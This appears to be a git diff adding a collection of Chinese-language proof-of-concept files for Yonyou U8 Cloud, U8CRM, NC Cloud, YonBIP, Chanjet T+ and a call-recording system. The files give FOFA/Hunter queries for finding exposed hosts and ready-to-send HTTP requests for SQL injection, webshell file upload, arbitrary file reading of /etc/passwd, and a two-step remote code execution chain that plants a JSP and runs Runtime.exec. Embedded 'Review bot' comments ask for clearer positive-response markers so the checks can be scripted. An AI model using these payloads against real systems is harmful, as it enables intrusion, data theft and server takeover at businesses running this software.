@@ -0,0 +1,13 @@ +## 用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞 + + +## poc +``` +POST /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 + +{"reportType":"1';waitfor delay '0:0:3'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]} +``` diff --git a/用友U8-Cloud-upload任意文件上传漏洞.md b/用友U8-Cloud-upload任意文件上传漏洞.md new file mode 100644 index 0000000..7312509 --- /dev/null +++ b/用友U8-Cloud-upload任意文件上传漏洞.md @@ -0,0 +1,28 @@ + +## 用友U8-Cloud upload任意文件上传漏洞 +该系统upload.jsp存在任意文件上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器 + +## fofa +```app="用友-U8-Cloud"``` + +## exp +``` +POST /linux/pages/upload.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 +Connection: close +Content-Length: 31 +Content-Type: application/x-www-form-urlencoded +filename: hack.jsp +Accept-Encoding: gzip + +<% out.println("The website has vulnerabilities!!");%> +``` +## 漏洞复现 +![](https://img-blog.csdnimg.cn/img_convert/4e222417f164a3b33772bf18041feb82.png) + +![](https://img-blog.csdnimg.cn/img_convert/d68273de84c541f1cb5a0ac52b469b98.png) + +## 路径 +http://ip:port/linux/hack.jsp + diff --git a/用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md b/用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md new file mode 100644 index 0000000..5cd8953 --- /dev/null +++ b/用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# 用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞 + +用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```java +app="用友-U8-Cloud" +title=="U8C" +``` + +## poc + +```javascript +GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.task.AddTaskDataRightAction&method=execute&strTaskID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081935783.png) diff --git a/用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md b/用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md new file mode 100644 index 0000000..65f168a --- /dev/null +++ b/用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞 + +用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```java +app="用友-U8-Cloud" +title=="U8C" +``` + +## poc + +```javascript +GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.web.reference.MultiRepChooseAction&method=execute&taskId=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![image-20240908193426080](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081934138.png) \ No newline at end of file 
diff --git a/用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞复现(CNVD-2024-33023).md b/用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞复现(CNVD-2024-33023).md new file mode 100644 index 0000000..a86a83b --- /dev/null +++ b/用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞复现(CNVD-2024-33023).md @@ -0,0 +1,20 @@ +# 用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞复现(CNVD-2024-33023) + +用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa +```javascript +title=="U8C" +``` + +## poc +```javascript +GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![image-20241219152517973](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191525077.png) \ No newline at end of file diff --git a/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞 - 副本.md b/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞 - 副本.md new file mode 100644 index 0000000..5cd8953 --- /dev/null +++ b/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞 - 副本.md 
@@ -0,0 +1,23 @@ +# 用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞 + +用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```java +app="用友-U8-Cloud" +title=="U8C" +``` + +## poc + +```javascript +GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.task.AddTaskDataRightAction&method=execute&strTaskID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081935783.png) diff --git a/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md b/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md new file mode 100644 index 0000000..66f6e7a --- /dev/null +++ b/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md 
@@ -0,0 +1,29 @@ +# 用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞 + +用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```java +app="用友-U8-Cloud" +title=="U8C" +``` + +## poc + +```javascript +GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.RepAddToTaskAction&method=save&taskSelected=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409010005308.png) + + + +## 漏洞来源 + +- [用友U8 Cloud RepAddToTaskAction SQL注入漏洞复现-CSDN博客](https://axsec.blog.csdn.net/article/details/141719740?spm=1001.2014.3001.5502) \ No newline at end of file diff --git a/用友U8-Cloud系统接口approveservlet存在SQL注入漏洞.md b/用友U8-Cloud系统接口approveservlet存在SQL注入漏洞.md new file mode 100644 index 0000000..cfae3f4 --- /dev/null +++ b/用友U8-Cloud系统接口approveservlet存在SQL注入漏洞.md 
@@ -0,0 +1,30 @@ +# 用友U8-Cloud系统接口approveservlet存在SQL注入漏洞 + +用友U8-Cloud系统接口approveservlet存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +title=="U8C" +``` + +## hunter + +```javascript +app.name="用友 U8 Cloud" +``` + +## poc + +```javascript +POST /service/approveservlet HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Connection: close + +BILLID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20WPWZ&BILLTYPE=4331&USERID=3&RESULT=4&DATASOURCE=U8cloud +``` + +![image-20241101195523618](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011955693.png) diff --git a/用友U8-Cloud系统接口esnserver存在任意文件上传漏洞.md b/用友U8-Cloud系统接口esnserver存在任意文件上传漏洞.md new file mode 100644 index 0000000..b8f9863 --- /dev/null +++ b/用友U8-Cloud系统接口esnserver存在任意文件上传漏洞.md 
@@ -0,0 +1,38 @@ +# 用友U8-Cloud系统接口esnserver存在任意文件上传漏洞 +用友U8 cloud前台任意文件上传导致远程命令执行漏洞。未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。 + +## fofa + +```javascript +title=="U8C" +``` + +## hunter + +```javascript +app.name="用友 U8 Cloud" +``` + +## poc +```plain +POST /service/esnserver HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Token: 469ce01522f64366750d1995ca119841 +Content-Length: 583 + +{"invocationInfo":{"ucode":"123","dataSource":"U8cloud","lang":"en"},"method":"uploadFile","className":"nc.itf.hr.tools.IFileTrans","param":{"p1":"UEsDBAoAAAAAAA9tSFkDJCbXbQAAAG0AAAAKAAAAY29tcHJlc3NlZDwlIG91dC5wcmludGxuKCIxMjM0NTYiKTsgbmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTsgJT5QSwECHwAKAAAAAAAPbUhZAyQm120AAABtAAAACgAkAAAAAAAAACAAAAAAAAAAY29tcHJlc3NlZAoAIAAAAAAAAQAYACbiFZZEGdsBHOcblEgZ2wERXscDRxnbAVBLBQYAAAAAAQABAFwAAACVAAAAAAA","p2":"webapps/u8c_web/test123.jsp"},"paramType":["p1:[B","p2:java.lang.String"]} +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1728923468100-14a051e7-c93c-4c37-9a6f-0782a64222a7.png) + +上传文件位置 + +```plain +/test123.jsp +``` + + + diff --git a/用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞.md b/用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞.md new file mode 100644 index 0000000..353c59e --- /dev/null +++ b/用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞.md 
@@ -0,0 +1,30 @@ +# 用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞 + +用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +title=="U8C" +``` + +## hunter + +```javascript +app.name="用友 U8 Cloud" +``` + +## poc + +```javascript +POST /u8cloud/openapi/uapbd.refdef.query?appcode=huo&isEncrypt=N HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: application/json +Accept-Encoding: gzip +Connection: close + +{"refName":"1%' UNION ALL SELECT 1,CONVERT(INT,@@VERSION),1-- "} +``` + +![image-20241101195827533](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011958611.png) \ No newline at end of file diff --git a/用友U8-cloud-RegisterServlet接口存在SQL注入漏洞.md b/用友U8-cloud-RegisterServlet接口存在SQL注入漏洞.md new file mode 100644 index 0000000..4e8a728 --- /dev/null +++ b/用友U8-cloud-RegisterServlet接口存在SQL注入漏洞.md 
@@ -0,0 +1,38 @@ +## 用友U8-cloud RegisterServlet接口存在SQL注入漏洞 +U8 Cloud是用友公司推出的企业上云数字化平台,为成长型和创新型企业提供全面的云ERP解决方案。 + +U8 cloud不同于传统的ERP,融合了交易、服务、管理于一体的整体解决方案。U8 cloud集中于企业内部管理管控,管理,规范、高效、协同、透明。通过云模式,低成本,快速部署,即租即用的帮助企业免除硬软件投入的快速搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。 + +该系统RegisterServlet接口存在SQL注入漏洞,并且属于1day状态。 + +## fofa +``` +app="用友-U8-Cloud" +``` + +## poc +发送下面的poc,响应包返回123456 的md5为存在漏洞 +``` +POST /servlet/RegisterServlet HTTP/1.1 +Host: ip:port +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 +Connection: close +Content-Length: 85 +Accept: */* +Accept-Language: en +Content-Type: application/x-www-form-urlencoded +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip + +usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0-- +``` +返回 +``` +HTTP/1.1 200 OK +Connection: close +Content-Length: 71Date: Mon, 13 Nov 2023 02:25:54 GMT +Server: Apache-Coyote/1.1 +Set-Cookie: JSESSIONID=F66A9268A74114BADA7CB11346378B11.server; +Path=/; HttpOnly +Error:?? nvarchar ? 'e10adc3949ba59abbe56e057f20f883e' ??????? int ???? +``` diff --git a/用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞.md b/用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞.md new file mode 100644 index 0000000..b3806e0 --- /dev/null +++ b/用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞.md 
@@ -0,0 +1,28 @@ +# 用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞 + +用友U8 CRM 客户关系管理系统 config/relobjreportlist.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +## fofa + +```javascript +title="用友U8CRM" +``` + +## hunter + +```javascript +app.name="用友 CRM" +``` + +## poc + +```javascript +POST /config/relobjreportlist.php HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=bgsesstimeout-; + +DontCheckLogin=1&Action=CheckRelUser&typeID=1&objType=1&ids=1');WAITFOR DELAY '0:0:5'-- +``` + +![image-20240918135123639](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409181351732.png) \ No newline at end of file diff --git a/用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞.md b/用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞.md new file mode 100644 index 0000000..f7568f3 --- /dev/null +++ b/用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞.md @@ -0,0 +1,30 @@ +# 用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞 + +用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +## fofa + +```javascript +title="用友U8CRM" +``` + +## hunter + +```javascript +app.name="用友 CRM" +``` + +## poc + +```javascript +GET /ajax/setremindtoold.php?dID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: PHPSESSID=bgsesstimeout-; +Connection: close +``` + +![image-20240926094445980](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409260944059.png) \ No newline at end of file diff --git a/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md b/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md new file mode 100644 index 0000000..2d0c829 --- /dev/null +++ b/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md 
@@ -0,0 +1,22 @@ +# 用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞 + +用友U8 Cloud nc.ui.iufo.query.measurequery.MeasureQResultAction 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +title=="U8C" +``` + +## poc + +```java +GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQResultAction&method=execute&selectQueryCondition=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408241854934.png) \ No newline at end of file diff --git a/用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md b/用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md new file mode 100644 index 0000000..f6eaf82 --- /dev/null +++ b/用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md 
@@ -0,0 +1,22 @@ +# 用友YonBIP高级版yonbiplogin存在任意文件读取漏洞 +YonBIP用友商业创新平台,是用友在数字经济时代面向成长型、大型企业及巨型企业,融合了先进且高可用技术平台和公共与关键商业应用与服务,支撑和运行客户的商业创新(业务创新、管理变革),并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版yonbiplogin存在任意文件读取漏洞 + +## fofa +```javascript +title="YonBIP" || title="数字化工作台" +``` + +![](https://cdn.nlark.com/yuque/0/2023/png/1622799/1699617335151-ab45cdc1-ba2a-4518-8a9d-5aa6a95e7263.png) + +## poc +```plain +GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Connection: close +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip, deflate, br +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731492309168-0423a749-4e24-497f-81f0-6ca9908af8d6.png) + diff --git a/用友crm客户关系管理help.php存在任意文件读取漏洞.md b/用友crm客户关系管理help.php存在任意文件读取漏洞.md new file mode 100644 index 0000000..91834a4 --- /dev/null +++ b/用友crm客户关系管理help.php存在任意文件读取漏洞.md @@ -0,0 +1,19 @@ +# 用友crm客户关系管理help.php存在任意文件读取漏洞 + + + +## fofa + +```yaml +body="用友 U8CRM" +``` + +## poc + +```java +GET /pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +``` + diff --git a/用友nc-cloud-RCE.md b/用友nc-cloud-RCE.md new file mode 100644 index 0000000..0c1cfb9 --- /dev/null +++ b/用友nc-cloud-RCE.md 
@@ -0,0 +1,47 @@ +## 用友nc-cloud RCE +``` +漏洞影响 +NC63、NC633、NC65 +NC Cloud1903、NC Cloud1909 +NC Cloud2005、NC Cloud2105、NC Cloud2111 +YonBIP高级版2207 + +先发送数据包,返回200 + +POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 +Host: 127.0.0.1:8080 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: cookiets=168170496; JSESSIONID=33A343770FF.server +If-None-Match: W/"1571-1589211696000" +If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 249 + +{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]} + +再发送数据包执行命令,返回命令执行结果 + +POST /404.jsp?error=bsh.Interpreter HTTP/1.1 +Host: 127.0.0.1:8080 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: cookiets=1681785232226; JSESSIONID=334D3ED07A343770FF.server +If-None-Match: W/"1571-1589211696000" +If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 104 + +cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ping 8.8.8.8").getInputStream()) + +``` 
diff --git a/用友u9系统接口TransWebService存在未授权访问漏洞.md b/用友u9系统接口TransWebService存在未授权访问漏洞.md new file mode 100644 index 0000000..a0548af --- /dev/null +++ b/用友u9系统接口TransWebService存在未授权访问漏洞.md @@ -0,0 +1,16 @@ +# 用友u9系统接口TransWebService存在未授权访问漏洞 +用友U9秉承互联网基因,是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实现商业模式创新、组织变革与管理升级。用友u9 TransWebService存在未授权访问漏洞 + +## Hunter + +```javascript +web.body="logo-u9.png" +``` + +## poc +```plain +/U9Supplier/CS/Office/TransWebService.asmx +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729854825599-c70fe318-3b26-4416-82ef-6d38998e1e0f.png) + diff --git a/用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞.md b/用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞.md new file mode 100644 index 0000000..e9a1c38 --- /dev/null +++ b/用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞.md @@ -0,0 +1,32 @@ +# 用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞 + +用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +app="畅捷通-TPlus" +``` + +## poc + +```pseudocode +POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Length: 180 +Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6 + +--f95ec6be8c3acff8e3edd3d910d3b9a6 +Content-Disposition: form-data; name="file"; filename="test123.txt" +Content-Type: image/jpeg + +test123 +--f95ec6be8c3acff8e3edd3d910d3b9a6-- +``` + +文件路径`/tplus/UserFiles/test123.txt` + diff --git a/申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞.md b/申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞.md new file mode 100644 index 0000000..3a55fff --- /dev/null +++ b/申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞.md 
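Review bot: in the `用友u9系统接口TransWebService` hunk the PoC is just the path `/U9Supplier/CS/Office/TransWebService.asmx` with no statement of what an unauthenticated positive looks like (the screenshot is the only evidence); add a sentence naming the response content that distinguishes a vulnerable host from one that redirects to login, so the check can be scripted without false positives.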
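Review bot: in the `用友畅捷通-TPlus...FileUploadHandler.ashx` hunk the request line `/tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login` carries a `/;/login` suffix that is never explained; a reader will take it for a typo and drop it, and it is the part a detection rule on this handler should match, so say what it is for. The fence is tagged `pseudocode` and the fofa fence `javascript`; use `plain`. Uploading a harmless `test123.txt` and giving the verification path `/tplus/UserFiles/test123.txt` is the right way to demonstrate an upload bug without leaving executable content behind.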
@@ -0,0 +1,30 @@ +# 申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞 + +# 一、漏洞简介 +申瓯通信设备有限公司在线录音管理系统系统是一款全面的企业管理软件,涵盖多个领域,助力企业实现信息化管理和业务优化。申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞。 + +# 二、影响版本 ++ 在线录音管理系统 + +# 三、资产测绘 ++ fofa`title="在线录音管理系统"` + +![1718298593944-67a12797-71e8-44ee-8755-020482502e3d.png](./img/S_cYMDLU99OSGVbJ/1718298593944-67a12797-71e8-44ee-8755-020482502e3d-126112.png) + +# 四、漏洞复现 +```java +GET /callcenter/public/index.php?s=index/\think\Lang/load&file=/etc/passwd HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 +Cache-Control: no-cache +Pragma: no-cache +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1718714151400-95020a2d-915f-4d12-b219-daf747b492c3.png](./img/S_cYMDLU99OSGVbJ/1718714151400-95020a2d-915f-4d12-b219-daf747b492c3-939244.png) + + + +> 更新: 2024-06-23 23:42:49 +> 原文: \ No newline at end of file diff --git a/申瓯通信设备有限公司在线录音管理系统存在任意文件下载漏洞.md b/申瓯通信设备有限公司在线录音管理系统存在任意文件下载漏洞.md new file mode 100644 index 0000000..a954df2 --- /dev/null +++ b/申瓯通信设备有限公司在线录音管理系统存在任意文件下载漏洞.md 
